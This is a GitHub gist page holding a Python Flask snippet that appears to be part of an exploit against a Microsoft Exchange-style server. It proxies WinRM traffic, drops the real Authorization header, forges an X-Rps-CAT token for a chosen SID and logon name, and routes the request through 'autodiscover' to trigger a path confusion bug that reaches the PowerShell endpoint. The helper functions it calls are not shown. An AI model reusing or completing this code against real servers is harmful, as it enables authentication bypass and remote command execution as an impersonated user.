Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
app = Flask(__name__)
@app.route('/<path:path>', methods = ['POST', 'GET'])
def index(path):
if request.method == 'GET':
return 'ok'
# check data
data = request.stream.read()
action = re.search(r'<a:Action s:mustUnderstand="true">(.+?)</a:Action>', data)
assert action, "WinRM action not found"
# modify headers
req_headers = {}
for k, v in request.headers.iteritems():
if k == 'Host':
v = HOST
if k == 'Authorization':
continue
req_headers[k] = v
# create X-Rps-CAT token
token = b64encode(create_token(SID, LOGON_NAME))
# rewrite to `autodiscover` and trigger the path confusion bug
r = exploit('/Powershell?X-Rps-CAT=' + token, headers=req_headers, data=data)
# make response
resp = Response(r.content, status=r.status_code)
for k, v in r.headers.iteritems():
if k in ['Content-Encoding', 'Content-Length', 'Transfer-Encoding']:
continue
resp.headers[k] = v
return resp
app.run(host="127.0.0.1", port=8000)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment